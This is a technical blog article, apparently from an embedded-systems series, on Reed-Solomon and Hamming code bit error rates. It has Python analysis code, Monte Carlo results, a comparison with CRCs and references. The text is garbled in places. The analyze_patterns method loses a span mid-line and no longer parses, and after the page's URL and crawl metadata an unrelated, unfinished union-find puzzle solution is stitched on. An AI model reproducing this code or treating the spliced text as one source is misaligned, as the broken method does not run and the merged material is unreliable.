vs = [v for v in users.keys() if v != remove_city]
es = [e for e in net if remove_city not in e]
grp = {v: v for v in vs}
for e in es:
union(grp, *e)
grp_scrore = [sum(users[v] for v in vs if grp[v] == g) for g in set(grp)]
return sum(x * x for x in grp_scrore) + users[remove_city]
def most_crucial(net, users):
citys = users.keys()
scores = [score_when_city_removed(net, users, c) for c in citys]
return [c for i, c in enumerate(citys) if scores[i] == min(scores)]!')
June 26, 2018
Forum
Price
Global Activity
ClassRoom Manager
Leaderboard
Coding games
Python programming for beginners
|
https://py.checkio.org/mission/node-crucial/publications/arbores401/python-3/first/share/00ebf7669eb85e7e0073df3aafe97ab2/
|
CC-MAIN-2021-31
|
refinedweb
| 165
| 60.24
|
Text::RewriteRules - A system to rewrite text using regexp-based rules
use Text::RewriteRules; RULES email \.==> DOT @==> AT ENDRULES print email("ambs@cpan.org") # prints ambs AT cpan DOT org RULES/m inc (\d+)=e=> $1+1 ENDRULES print inc("I saw 11 cats and 23 dogs") # prints I saw 12 cats and 24 dogs
This module uses a simplified syntax for regexp-based rules for rewriting text. You define a set of rules, and the system applies them until no more rule can be applied.
Two variants are provided:
while it is possible do substitute | apply first substitution rule
add a cursor to the beginning of the string while not reach end of string | apply substitute just after cursor and advance cursor | or advance cursor if no rule can be applied
A lot of computer science problems can be solved using rewriting rules.
Rewriting rules consist of mainly two parts: a regexp (LHS: Left Hand Side) that is matched with the text, and the string to use to substitute the content matched with the regexp (RHS: Right Hand Side).
Now, why don't use a simple substitute? Because we want to define a set of rules and match them again and again, until no more regexp of the LHS matches.
A point of discussion is the syntax to define this system. A brief discussion shown that some users would prefer a function to receive an hash with the rules, some other, prefer some syntax sugar.
The approach used is the last: we use
Filter::Simple such that we can add a specific non-perl syntax inside the Perl script. This improves legibility of big rewriting rules systems.
This documentation is divided in two parts: first we will see the reference of the module. Kind of, what it does, with a brief explanation. Follows a tutorial which will be growing through time and releases.
Note: most of the examples are very stupid, but that is the easiest way to explain the basic syntax.
The basic syntax for the rewrite rules is a block, started by the keyword
RULES and ended by the
ENDRULES. Everything between them is handled by the module and interpreted as rules or comments.
The
RULES keyword can handle a set of flags (we will see that later), and requires a name for the rule-set. This name will be used to define a function for that rewriting system.
RULES functioname ... ENDRULES
The function is defined in the main namespace where the
RULES block appears.
In this block, each line can be a comment (Perl style), an empty line or a rule.
A basic rule is a simple substitution:
RULES foobar foo==>bar ENDRULES
The arrow
==> is used as delimiter. At its left is the regexp to match, at the right side, the substitution. So, the previous block defines a
foobar function that substitutes all
foo by
bar.
Although this can seems similar to a global substitution, it is not. With a global substitution you can't do an endless loop. With this module it is very simple. I know you will get the idea.
You can use the syntax of Perl both on the left and right hand side of the rule, including
$1....
If the Perl substitution supports execution, why not to support it, also? So, you got the idea. Here is an example:
RULES foo (\d+)b=e=>'b' x $1 (\d+)a=eval=>'a' x ($1*2) ENDRULES
So, for any number followed by a
b, we replace by that number of
b's. For each number followed by an
a, we replace them by twice that number of
a's.
Also, you mean evaluation using an
e or
eval inside the arrow. I should remind you can mix all these rules together in the same rewriting system.
On some cases we want to perform a substitution if the pattern matches and a set of conditions about that pattern (or not) are true.
For that, we use a three part rule. We have the common rule plus the condition part, separated from the rule by
!!. These conditional rules can be applied both for basic and execution rules.
RULES translate ([[:alpha:]]+)=e=>$dic{$1}!! exists($dic{$1}) ENDRULES
The previous example would translate all words that exist on the dictionary.
Sometimes it is useful to change something on the string before starting to apply the rules. For that, there is a special rule named
begin (or
b for abbreviate) just with a RHS. This RHS is Perl code. Any Perl code. If you want to modify the string, use
$_.
RULES foo =b=> $_.=" END" ENDRULES
As you use
last on Perl to skip the remaining code on a loop, you can also call a
last (or
l) rule when a specific pattern matches.
Like the
begin rule with only a RHS, the
last rule has only a LHS:
RULES foo foobar=l=> ENDRULES
This way, the rules iterate until the string matches with
foobar.
You can also supply a condition in a last rule:
RULES bar f(o+)b(a+)r=l=> !! length($1) == 2 * length($2);
It is possible to use the regular expressions /x mode in the rewrite rules. In this case:
RULES/x f1 (\d+) (\d{3}) (000) ==>$1 milhao e $2 mil!! $1 == 1 ENDRULES
To facilitate matching complex languages Text::RewriteRules defines a set of regular expressions that you can use (without defining them).
There are three kind of usual parenthesis: the standard parenthesis, brackets or curly braces. You can match a balanced string of parenthesis using the power expressions
[[:PB:]],
[[:BB:]] and
[[:CBB:]] for these three kind of parenthesis.
For instance, if you apply this rule:
[[:BB:]]==>foo
to this string
something [ a [ b] c [d ]] and something more
then, you will get
something foo and something more
Note that if you apply it to
something [[ not ] balanced [ here
then you will get
something [foo balanced [ here
The power expression
[[:XML:]] match a XML tag (with or without children XML tags. Note that this expression matches only well formed XML tags.
As an example, the rule
[[:XML:]]=>tag
applied to the string
<a><b></a></b> and <more><img src="foo"/></more>
will result in
<a><b></a></b> and tag
At the moment, just a set of commented examples.
Example1 -- from number to portuguese words (using traditional rewriting)
Example2 -- Naif translator (using cursor-based rewriting)
Yes, you can use Lingua::PT::Nums2Words and similar (for other languages). Meanwhile, before it existed we needed to write such a conversion tool.
Here I present a subset of the rules (for numbers bellow 1000). The generated text is Portuguese but I think you can get the idea. I'll try to create a version for English very soon.
You can check the full code on the samples directory (file
num2words).
use Text::RewriteRules; RULES num2words 100==>cem 1(\d\d)==>cento e $1 0(\d\d)==>$1 200==>duzentos 300==>trezentos 400==>quatrocentos 500==>quinhentos 600==>seiscentos 700==>setecentos 800==>oitocentos 900==>novecentos (\d)(\d\d)==>${1}00 e 0(\d)==>$1 (\d)(\d)==>${1}0 e $2 1==>um 2==>dois 3==>três 4==>quatro 5==>cinco 6==>seis 7==>sete 8==>oito 9==>nove 0$==>zero 0==> ==> ,==>, ENDRULES num2words(123); # returns "cento e vinte e três"
use Text::RewriteRules; %dict=(driver=>"motorista", the=>"o", of=>"de", car=>"carro"); $word='\b\w+\b'; if( b(a("I see the Driver of the car")) eq "(I) (see) o Motorista do carro" ) {print "ok\n"} else {print "ko\n"} RULES/m a ($word)==>$dict{$1}!! defined($dict{$1}) ($word)=e=> ucfirst($dict{lc($1)}) !! defined($dict{lc($1)}) ($word)==>($1) ENDRULES RULES/m b \bde o\b==>do ENDRULES
Alberto Simões,
<ambs@cpan.org>
José João Almeida,
<jjoao@cpan.org>
We know documentation is missing and you all want to use this module. In fact we are using it a lot, what explains why we don't have the time to write documentation.
Please report any bugs or feature requests to
bug-text-rewrite@rt.cpan.org, or through the web interface at. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.
Damian Conway for Filter::Simple
Copyright 2004-2012 Alberto Simões and José João Almeida, All Rights Reserved.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
http://search.cpan.org/~ambs/Text-RewriteRules-0.25/lib/Text/RewriteRules.pm
|
CC-MAIN-2018-17
|
refinedweb
| 1,410
| 71.34
|
Red Hat Bugzilla – Full Text Bug Listing
Description of problem:
If you manually change the network name to MAC address matching it creates new entries in '/etc/udev/rules.d/70-persistent-net.rules' instead of removing the old entries. For example, I've got three interfaces and the installer chose two given NICs as 'eth0' and 'eth2'. I went in to the advanced network configuration and swapped the MAC addresses and it created two new lines in the above file, causing 'eth0' to not come up on first boot. Deleted the duplicate lines solved the problem.
Version-Release number of selected component (if applicable):
anaconda-13.21.82-1.el6.x86_64
How reproducible:
First try, will try on other hardware and report if not 100%
Steps to Reproduce:
1. Select advanced configuration during installation and swap the MAC address between two 'ethX' devices.
2. Complete install and reboot.
3.
Actual results:
Duplicate entries.
Expected results:
Single entries with revised MAC addresses.
Additional info:.
Just name your interfaces with another namespace like "net*" and all those problems go away.
This issue is probably related to:
(In reply to comment #2)
>.
It's been some time since I filed this bug, I will have to test to see if it persists.
(In reply to comment #3)
> Just name your interfaces with another namespace like "net*" and all those
> problems go away.
> This issue is probably related to:
>
I'm not sure if it's related, I am not familiar with the source so I can't comment on the patch.
As for changing the name; That is another work-around, not a fix to the actual problem..
please retest with RHEL 6.3 udev
ping?
Blast from the past... sorry, I'll try to test today on 6.7.
Any news?
Sorry for the delay...
It still created the duplicate udev rules. Fresh RHEL 6.7 install in a KVM VM with two interfaces. As before, I went to advanced network settings and swapped the MAC addresses.
I tried this now with two interfaces, eth0 and eth1. I left Mac addresses as they were and added Cloned mac address which was Mac address of the other interface. As this should be way how to actually swap mac addresses, because if you change mac addresses them self you are basically switching interface names.
I went ahead, knowing this is probably all wrong, finished installation and rebooted. I ended up with the system which had configured same MAC addresses on both interfaces (that was sort of expected), 2 entries in 70-persistent rules, and invalid ifcfg-files (they contained HWADDR and MACADDR option which is written in initscripts docs as unsupported/broken setup).
Bottom line, I think that what you are trying to do just can't work.
I've found similar bug reports for ubuntu/debian[1][2]. However I was not able to reproduce the issue as described by [1]. I can however backport the fix which ubuntu/debian now have and provide you with the test package.
[1]
[2]
Here are test packages,
Just to elaborate on comment #14.
Test packages them self are not that useful because issue occurs during system installation. Thus, I've created anaconda updates.img, problem is that I wasn't able to successfully use it (probably due to some anaconda limitation with regards to update images in RHEL6).
The only way I can think of how you can test the new package (in VM) is to unpack rpm to some place which is accessible from installer environment, start installation, using shell provided by installer replace udev and other files shipped in udev rpm which are part of installer environment, kill running udev daemon, start it again (now process will start from new binary), and finally hot-plug second NIC, then proceed with installation as described in bug Description.
This update broke renaming of the devices on our machines.
We have:
# cat /etc/sysconfig/network-scripts/ifcfg-lblnet
DEVICE=lblnet
BOOTPROTO=static
IPADDR=10.0.0.2
NETMASK=255.255.255.0
IPV6INIT=yes
IPV6ADDR=fd00:0::2/64
IPV6_AUTOCONF=no
NM_CONTROLLED=yes
ONBOOT=yes
TYPE=Ethernet
HWADDR=c4:34:6b:ac:98:8d
If I downgrade udev, everything works.
Swapping MAC addresses don't caused any duplicates in /etc/udev/rules.d/70-persistent-net.rules
Actually manual swap just rename devices and create new records in /etc/udev/rules.d/70-persistent-net.rules .
If for swapping is used "clone filed" in advanced setting, result may caused problems, because this way of swapping MAC addresses is not recommended (supported).
Since I was not able reproduce the scenario of duplicates records, verified.
|
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=652499
|
CC-MAIN-2017-47
|
refinedweb
| 778
| 56.45
|
IRC log of wai-wcag on 2004-08-25
Timestamps are in UTC.
13:59:28 [RRSAgent]
RRSAgent has joined #wai-wcag
14:00:02 [ChrisR]
ChrisR has joined #wai-wcag
14:00:16 [Zakim]
WAI_WCAG(techniques)10:00AM has now started
14:00:23 [Zakim]
+Michael_Cooper
14:00:25 [Michael]
zakim, I am Michael_Cooper
14:00:25 [Zakim]
ok, Michael, I now associate you with Michael_Cooper
14:00:49 [nabe]
nabe has joined #wai-wcag
14:00:57 [Zakim]
+Chris_Ridpath
14:01:21 [Zakim]
+??P8
14:01:26 [Zakim]
+Alex_Li
14:01:39 [Michael]
zakim, ??P8 is David_MacDonald
14:01:39 [Zakim]
+David_MacDonald; got it
14:01:55 [Becky]
Becky has joined #wai-wcag
14:02:35 [Zakim]
+??P12
14:02:55 [Michael]
zakim, ??P12 is Takayuki_Watanabe
14:02:58 [Zakim]
+Takayuki_Watanabe; got it
14:03:02 [Zakim]
+Becky_Gibson
14:03:26 [Zakim]
+John_Slatin
14:03:47 [nabe]
zakim, I am Takayuki_Watanabe
14:03:47 [Zakim]
ok, nabe, I now associate you with Takayuki_Watanabe
14:03:57 [Zakim]
+Wendy
14:04:29 [wendy]
wendy has joined #wai-wcag
14:05:10 [wendy]
zakim, who's on the phone?
14:05:10 [Zakim]
On the phone I see Michael_Cooper, Chris_Ridpath, David_MacDonald, Alex_Li, Takayuki_Watanabe, Becky_Gibson, John_Slatin, Wendy
14:05:53 [Zakim]
+[Microsoft]
14:06:37 [Michael]
zakim, [Microsoft] is temporarily Jenae_Andershonis
14:06:37 [Zakim]
+Jenae_Andershonis; got it
14:08:11 [wendy]
Topic: Techniques proposals
14:08:42 [wendy]
Gateway, John: has not gone to list as proposal. still working on.
14:08:59 [wendy]
goal: to have draft to list as proposal by end of friday.
14:09:16 [wendy]
have not received feedback on 1.1 from 30 july draft.
14:10:23 [wendy]
mc: want to discuss anything?
14:11:14 [wendy]
js: purpose of gateway is to set up use of other technologies, would like people to take a look where mention other technologies (e.g., svg, mathml)
14:11:24 [Zakim]
+??P26
14:11:46 [Michael]
zakim, ??P26 is Lisa_Seeman
14:11:46 [Zakim]
+Lisa_Seeman; got it
14:12:00 [wendy]
js: secondly, in general, is it making sense and fulfilling the purpose/role you had anticipated/expected for gateway
14:12:32 [wendy]
js: there is material in the 30 july draft that needs reviewing. there is also a proposal that will be coming on friday.
14:20:40 [wendy]
CSS, Wendy: need results of testing from user agents (e.g. support for xx-small to xx-large) before know how to move forward. will approach uawg about testing. found a test file. wonder about how it *should* work in a screen reader.
14:22:15 [wendy]
wac sent requests for review/contributions to variety of css developers
14:24:07 [wendy]
bg looked up image replacement thread. tom gilmore found a way to use images of text and have equivalents that screen readers will pick up.
14:25:56 [wendy]
action: bg send proposal to list re: image replacement technique
14:26:23 [wendy]
HTML, Michael: went through techniques that chris submitted and created proposals around them.
14:26:32 [wendy]
mc with 6, decided they were gateway techniques not html.
14:28:36 [wendy]
mc after incorporated into gateway, may come back to html techniques (after we have the structure)
14:29:11 [wendy]
js issue with granularity of gateway techniques in relation to the tech-specific.
14:29:48 [wendy]
js tend to think in terms of present the issues/general considerations in connection w/a particular guideline then break those into categories and then funnel out to tech-specifics.
14:30:30 [wendy]
js might be a general thing about link text or several places in gateway to talk about. but, don't think we're all operating under the same assumptions wrt gateway.
14:30:34 [Michael]
ack David
14:30:35 [wendy]
s/gateway/granularity
14:31:11 [wendy]
mc a gateway tech to talk about clear link text. in html: when creating area, "follow this gateway technique"
14:31:41 [wendy]
dmd some people only read techniques. it puts a burden on us to make the integration in such a way that they get the interconnections or lose things in the shuffle.
14:31:54 [wendy]
dmd be careful when moving critical information to the gateway.
14:32:17 [wendy]
js how do we deal with things where multiple technologies are involved or required to make one thing happen.
14:32:35 [wendy]
js easy to imagine things where to do something you need html, css, and scripting at a minimum.
14:32:48 [wendy]
js since those live in different documents, how make sure they all get pulled together?
14:32:55 [wendy]
js e.g., zooming images.
14:33:23 [wendy]
js for 1.3, showing the structure of graphical material, can do that in svg. zooming would allow you to get at the detail.
14:34:45 [wendy]
ls xsl can pull in different documents, it can be an entry point and apply diff xsl.
14:35:08 [wendy]
mc can make the connections in the xml documents, less clear on how to present to people.
14:37:06 [wendy]
wac think some of this will be tied together in the scripting techniques. matt may recruited several scripting people to the mailing list. has promised a first internal draft by 10 sept.
14:37:48 [wendy]
mc for other of chris' submissions, some were obviously/easy to make into techniques. others were related to wcag 1.0 guidelines. some i combined concepts.
14:38:06 [wendy]
mc e.g., "make sure plug-ins are directly accessible" same with color and flicker.
14:38:23 [wendy]
mc those will need to point to guidelines or gateway techniques
14:39:05 [wendy]
mc html techs can't say too much about plug-ins, because they are not html.
14:39:16 [wendy]
js perhaps this is where the gateway can pull together? it can talk about plug-ins
14:39:36 [wendy]
js gateway can say, this (html) is not sufficient on its own
14:40:06 [wendy]
wac then in resources, point to flash or java techniques (at macromedia or sun or ibm)
14:41:26 [wendy]
wac similar issue with multimedia. in gateway we'll say that captions need to be provided, but point off to real/quicktime/smil etc for *how* to provide the captions.
14:41:35 [wendy]
js then there are issues with the player themselves.
14:41:49 [wendy]
mc our techniques have to speak to ways that do work
14:42:07 [wendy]
mc w/applets, say "better to use plug-in than applet viewer" where do we say that?
14:43:38 [wendy]
wac display user agent data in gateway or html techs? perhaps both
14:43:47 [wendy]
mc "plug-ins" only apply to html?
14:44:05 [wendy]
wac mixed namespaces, not sure called "plug-in" but need code that can interpret
14:44:18 [wendy]
js 508 says "if need 3rd party s/w to render..." provide a link
14:44:30 [wendy]
mc jw has talked about "accessible viewer"
14:44:43 [wendy]
mc decided not to bump plug-ins off my plate, but may bump parts to gateway
14:45:27 [wendy]
mc combined 4 techniques about presentational elements (b, i, basefont, font). propose that we add those to a list of html elements that should be replaced with css.
14:45:44 [wendy]
mc an existing technique, but no list of elements yet. propose these are the beginning of the list.
14:46:14 [wendy]
mc "title attribute for object" - my feeling, we dont' make title mandatory for most elements, therefore shouldn't do it here.
14:46:33 [wendy]
cr i wll send a message to the list. need to figure out where that one came from.
14:46:37 [wendy]
#915
14:47:18 [wendy]
mc "mandatory h1" - require that the first heading on a page be an h1. this is used in the french accessibility guidelines. unsure if wcag would require.
14:47:54 [wendy]
mc several approaches: 1. don't require 2. if using headings, start with h1 3. if require, then also require that be the first one on the page 4. or only that it is is present
14:48:18 [wendy]
mc could have h2 indicating navigation then h1 in the body
14:48:24 [wendy]
mc therefore, not always first one
14:48:57 [wendy]
ls document could be part of set of documents
14:49:12 [wendy]
mc if requiring h1s, require only one or are multiple ok?
14:49:27 [wendy]
ls if something is part of a book, could say "title page elsewhere"
14:51:30 [wendy]
14:52:15 [wendy]
14:55:45 [wendy]
14:56:07 [wendy]
in xhtml 2 use h/section
14:56:35 [wendy]
mc braillenet may use h1 to indicate start of content (i.e., when have h2 to indicate beginning of navigation)
15:01:06 [Zakim]
-Lisa_Seeman
15:01:32 [wendy]
on this call: agreement that most important is headings to be nested correctly, h1 is not required. it is on the list for discussion, but not a lot of support for it.
15:01:54 [Zakim]
+??P25
15:02:14 [wendy]
zakim, ??P25 is Lisa_Seeman
15:02:14 [Zakim]
+Lisa_Seeman; got it
15:02:33 [Becky]
I have to run to another meeting - bye
15:02:40 [wendy]
15:02:52 [Zakim]
-Becky_Gibson
15:02:54 [Zakim]
-John_Slatin
15:11:38 [ChrisR]
Test Suite:
15:14:52 [Michael]
action: Michael review test suite for language
15:16:47 [David_MacDonald]
David_MacDonald has joined #wai-wcag
15:17:40 [wendy]
cr proposes that the test suite should be normative
15:17:47 [wendy]
wac how often update for new techniques?
15:17:50 [wendy]
cr once a year
15:21:57 [wendy]
cr if its not normative, is there another status to give it?
15:22:22 [wendy]
ls such a restriction on creativity
15:22:49 [wendy]
wac realistic to update every year when has taken 6 to produce one normative document?
15:26:24 [wendy]
cr not meant to restrict people. you can't remove some of these things. meant to show that we know the best way to mark up tables (e.g.)
15:26:32 [wendy]
cr this is the minimum standard
15:26:38 [wendy]
cr it's base level accessibility
15:26:45 [wendy]
(for html)
15:27:34 [wendy]
cr want this to be strong and clear
15:28:23 [wendy]
ls have you looked at the work of task force 3 from EuroAccessibility?
15:28:32 [wendy]
ls they are defining methodologies for testing.
15:29:08 [wendy]
q+ to say "what about usability testing?"
15:31:32 [wendy]
zakim, who's making noise?
15:31:44 [Zakim]
wendy, listening for 10 seconds I heard sound from the following: Chris_Ridpath (9%), David_MacDonald (18%), Lisa_Seeman (96%)
15:31:50 [wendy]
zakim, mute David
15:31:50 [Zakim]
David_MacDonald should now be muted
15:31:55 [wendy]
zakim, unmute David
15:31:55 [Zakim]
David_MacDonald should no longer be muted
15:32:14 [Zakim]
-Takayuki_Watanabe
15:33:51 [Zakim]
-Lisa_Seeman
15:34:27 [Zakim]
+??P12
15:37:42 [wendy]
further discussion about normative or not. pros or cons.
15:38:53 [Michael]
action: Chris post link to test suite to list
15:40:35 [Zakim]
-Michael_Cooper
15:40:36 [Zakim]
-Alex_Li
15:40:37 [Zakim]
-Wendy
15:40:37 [ChrisR]
ChrisR has left #wai-wcag
15:40:38 [Zakim]
-Chris_Ridpath
15:40:39 [Zakim]
-??P12
15:40:40 [Zakim]
-Jenae_Andershonis
15:40:41 [Zakim]
-David_MacDonald
15:40:42 [Zakim]
WAI_WCAG(techniques)10:00AM has ended
15:40:43 [Zakim]
Attendees were Michael_Cooper, Chris_Ridpath, Alex_Li, David_MacDonald, Takayuki_Watanabe, Becky_Gibson, John_Slatin, Wendy, Jenae_Andershonis, Lisa_Seeman
15:41:00 [wendy]
RRSAgent, make log world
15:52:58 [nabe]
nabe has left #wai-wcag
16:31:37 [wendy]
zakim, bye
16:31:37 [Zakim]
Zakim has left #wai-wcag
16:31:41 [wendy]
RRSAgent, bye
16:31:41 [RRSAgent]
I see 3 open action items:
16:31:41 [RRSAgent]
ACTION: bg send proposal to list re: image replacement technique [1]
16:31:41 [RRSAgent]
recorded in
16:31:41 [RRSAgent]
ACTION: Michael review test suite for language [2]
16:31:41 [RRSAgent]
recorded in
16:31:41 [RRSAgent]
ACTION: Chris post link to test suite to list [3]
16:31:41 [RRSAgent]
recorded in
|
http://www.w3.org/2004/08/25-wai-wcag-irc.html
|
CC-MAIN-2013-48
|
refinedweb
| 2,088
| 69.82
|
isblank()
Test a character to see if it's a blank character
Synopsis:
#include <ctype.h> int isblank(blank() function tests the given character to see if it is a blank character. In the C locale, the set of blank characters consists of the space (' ') and the horizontal tab ('\t'). The isspace() function tests for a wider set of characters.
Returns:
Nonzero if c is a blank character; otherwise, zero.
Examples:
#include <stdio.h> #include <stdlib.h> #include <ctype.h> char the_chars[] = { 'A', 0x09, ' ', 0x7d, '\n' }; #define SIZE sizeof( the_chars ) / sizeof( char ) int main( void ) { int i; for( i = 0; i < SIZE; i++ ) { if( isblank( the_chars[i] ) ) { printf( "Char %c is a blank character\n", the_chars[i] ); } else { printf( "Char %c is not a blank character\n", the_chars[i] ); } } return EXIT_SUCCESS; }
This program produces the output:
Char A is not a blank character Char is a blank character Char is a blank character Char } is not a blank character Char is not a blank character
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
|
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/i/isblank.html
|
CC-MAIN-2014-52
|
refinedweb
| 187
| 64
|
.
This allows us to very quickly access and modify complicated subsets of an array's values.
import numpy as np rand = np.random.RandomState(42) x = rand.randint(100, size=10) print(x)
[51 92 14 71 60 20 82 86 74 74]
Suppose we want to access three different elements. We could do it like this:
[x[3], x[7], x[2]]
[71, 86, 14]
Alternatively, we can pass a single list or array of indices to obtain the same result:
ind = [3, 7, 4] x[ind]
array([71, 86, 60])
When using fancy indexing, the shape of the result reflects the shape of the index arrays rather than the shape of the array being indexed:
ind = np.array([[3, 7], [4, 5]]) x[ind]
array([[71, 86], [60, 20]])
Fancy indexing also works in multiple dimensions. Consider the following array:
X = np.arange(12).reshape((3, 4)) X
array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11]])
Like with standard indexing, the first index refers to the row, and the second to the column:
row = np.array([0, 1, 2]) col = np.array([2, 1, 3]) X[row, col]
array([ 2, 5, 11])
Notice that the first value in the result is
X[0, 2], the second is
X[1, 1], and the third is
X[2, 3].
The pairing of indices in fancy indexing follows all the broadcasting rules that were mentioned in Computation on Arrays: Broadcasting.
So, for example, if we combine a column vector and a row vector within the indices, we get a two-dimensional result:
X[row[:, np.newaxis], col]
array([[ 2, 1, 3], [ 6, 5, 7], [10, 9, 11]])
Here, each row value is matched with each column vector, exactly as we saw in broadcasting of arithmetic operations. For example:
row[:, np.newaxis] * col
array([[0, 0, 0], [2, 1, 3], [4, 2, 6]])
It is always important to remember with fancy indexing that the return value reflects the broadcasted shape of the indices, rather than the shape of the array being indexed.
print(X)
[[ 0 1 2 3] [ 4 5 6 7] [ 8 9 10 11]]
We can combine fancy and simple indices:
X[2, [2, 0, 1]]
array([10, 8, 9])
We can also combine fancy indexing with slicing:
X[1:, [2, 0, 1]]
array([[ 6, 4, 5], [10, 8, 9]])
And we can combine fancy indexing with masking:
mask = np.array([1, 0, 1, 0], dtype=bool) X[row[:, np.newaxis], mask]
array([[ 0, 2], [ 4, 6], [ 8, 10]])
All of these indexing options combined lead to a very flexible set of operations for accessing and modifying array values.
mean = [0, 0] cov = [[1, 2], [2, 5]] X = rand.multivariate_normal(mean, cov, 100) X.shape
(100, 2)
Using the plotting tools we will discuss in Introduction to Matplotlib, we can visualize these points as a scatter-plot:
%matplotlib inline import matplotlib.pyplot as plt import seaborn; seaborn.set() # for plot styling plt.scatter(X[:, 0], X[:, 1]);
Let's use fancy indexing to select 20 random points. We'll do this by first choosing 20 random indices with no repeats, and use these indices to select a portion of the original array:
indices = np.random.choice(X.shape[0], 20, replace=False) indices
array([93, 45, 73, 81, 50, 10, 98, 94, 4, 64, 65, 89, 47, 84, 82, 80, 25, 90, 63, 20])
selection = X[indices] # fancy indexing here selection.shape
(20, 2)
Now to see which points were selected, let's over-plot large circles at the locations of the selected points:
plt.scatter(X[:, 0], X[:, 1], alpha=0.3) plt.scatter(selection[:, 0], selection[:, 1], facecolor='none', s=200);
This sort of strategy is often used to quickly partition datasets, as is often needed in train/test splitting for validation of statistical models (see Hyperparameters and Model Validation), and in sampling approaches to answering statistical questions.
x = np.arange(10) i = np.array([2, 1, 8, 4]) x[i] = 99 print(x)
[ 0 99 99 3 99 5 6 7 99 9]
We can use any assignment-type operator for this. For example:
x[i] -= 10 print(x)
[ 0 89 89 3 89 5 6 7 89 9]
Notice, though, that repeated indices with these operations can cause some potentially unexpected results. Consider the following:
x = np.zeros(10) x[[0, 0]] = [4, 6] print(x)
[ 6. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
Where did the 4 go? The result of this operation is to first assign
x[0] = 4, followed by
x[0] = 6.
The result, of course, is that
x[0] contains the value 6.
Fair enough, but consider this operation:
i = [2, 3, 3, 4, 4, 4] x[i] += 1 x
array([ 6., 0., 1., 1., 1., 0., 0., 0., 0., 0.])
You might expect that
x[3] would contain the value 2, and
x[3] would contain the value 3, as this is how many times each index is repeated. Why is this not the case?
Conceptually, this is because
x[i] += 1 is meant as a shorthand of
x[i] = x[i] + 1.
x[i] + 1 is evaluated, and then the result is assigned to the indices in x.
With this in mind, it is not the augmentation that happens multiple times, but the assignment, which leads to the rather nonintuitive results.
So what if you want the other behavior where the operation is repeated? For this, you can use the
at() method of ufuncs (available since NumPy 1.8), and do the following:
x = np.zeros(10) np.add.at(x, i, 1) print(x)
[ 0. 0. 1. 2. 3. 0. 0. 0. 0. 0.]
The
at() method does an in-place application of the given operator at the specified indices (here,
i) with the specified value (here, 1).
Another method that is similar in spirit is the
reduceat() method of ufuncs, which you can read about in the NumPy documentation.
np.random.seed(42) x = np.random.randn(100) # compute a histogram by hand bins = np.linspace(-5, 5, 20) counts = np.zeros_like(bins) # find the appropriate bin for each x i = np.searchsorted(bins, x) # add 1 to each of these bins np.add.at(counts, i, 1)
The counts now reflect the number of points within each bin–in other words, a histogram:
# plot the results plt.plot(bins, counts, linestyle='steps');
Of course, it would be silly to have to do this each time you want to plot a histogram.
This is why Matplotlib provides the
plt.hist() routine, which does the same in a single line:
plt.hist(x, bins, histtype='step');
This function will create a nearly identical plot to the one seen here.
To compute the binning,
matplotlib uses the
np.histogram function, which does a very similar computation to what we did before. Let's compare the two here:
print("NumPy routine:") %timeit counts, edges = np.histogram(x, bins) print("Custom routine:") %timeit np.add.at(counts, np.searchsorted(bins, x), 1)
NumPy routine: 10000 loops, best of 3: 97.6 µs per loop Custom routine: 10000 loops, best of 3: 19.5 µs per loop
Our own one-line algorithm is several times faster than the optimized algorithm in NumPy! How can this be?
If you dig into the
np.histogram source code (you can do this in IPython by typing
np.histogram??), you'll see that it's quite a bit more involved than the simple search-and-count that we've done; this is because NumPy's algorithm is more flexible, and particularly is designed for better performance when the number of data points becomes large:
x = np.random.randn(1000000) print("NumPy routine:") %timeit counts, edges = np.histogram(x, bins) print("Custom routine:") %timeit np.add.at(counts, np.searchsorted(bins, x), 1)
NumPy routine: 10 loops, best of 3: 68.7 ms per loop Custom routine: 10 loops, best of 3: 135 ms per loop
What this comparison shows is that algorithmic efficiency is almost never a simple question. An algorithm efficient for large datasets will not always be the best choice for small datasets, and vice versa (see Big-O Notation).
But the advantage of coding this algorithm yourself is that with an understanding of these basic methods, you could use these building blocks to extend this to do some very interesting custom behaviors.
The key to efficiently using Python in data-intensive applications is knowing about general convenience routines like
np.histogram and when they're appropriate, but also knowing how to make use of lower-level functionality when you need more pointed behavior.
|
https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.07-Fancy-Indexing.ipynb
|
CC-MAIN-2019-13
|
refinedweb
| 1,447
| 63.29
|
Are you sure?
This action might not be possible to undo. Are you sure you want to continue?
Steven A. Sharpe
Division of Research and Statistics Federal Reserve Board Washington, D.C. 20551 (202)452-2875 ssharpe@frb.gov
April, 2004
Forthcoming in the Journal of Accounting, Auditing and Finance. The views expressed herein are those of the author and do not necessarily reflect the views of the Board nor the staff of the Federal Reserve System. I am grateful for comments and suggestions from Jason Cummins, Steve Oliner, and an anonymous referee, and members of the Capital Markets Section at the Board. Excellent research assistance was provided by Eric Richards and Dimitri Paliouras.
How Does the Market Interpret Analysts’ Long-term Growth Forecasts?
Abstractterm growth forecast. The model is estimated on industry- and sector-level portfolios of S&P 500 firms over 1983-2001. The estimated coefficients on consensus long-term growth forecasts suggest that the market applies these forecasts to an average horizon somewhere in the range of five to ten years.
-11. Introduction Long-term earnings growth forecasts by equity analysts have garnered increasing attention over the last several years, both in academic and practitioner circles. For instance, one of the more popular valuation yardsticks employed by investment professionals of late is the ratio of a company’s PE to its expected growth rate, where the latter is conventionally measured using analysts’ long-term earnings growth forecasts. An expanding body of academic research uses equity analysts’ earnings forecasts as well. One of the more common and important applications is the measurement of the equity risk premium; and, as Chan, Karceski and Lakonishok (2003) argue, analysts’ long-term forecasts are a “vital component” of such exercises. However, inferences from such studies can be quite sensitive to how those long-term growth forecasts are applied. Unfortunately, as evidenced by the range of assumptions employed in these applications, how these forecasts should be interpreted – that is, the horizon to which they ought to be applied – is quite ambiguous. For instance, Claus and Thomas (2001), in gauging the level of the equity risk premium, apply these growth forecasts to years 3 through 5; and beyond year 5 they apply a fixed growth rate assumption. At the other extreme, Harris and Marston (1992, 2001) and Khorana, Moyer and Patel (1999), apply these growth forecasts to an infinite horizon. In other studies, the assumed horizon usually falls somewhere in the middle.1 The implications 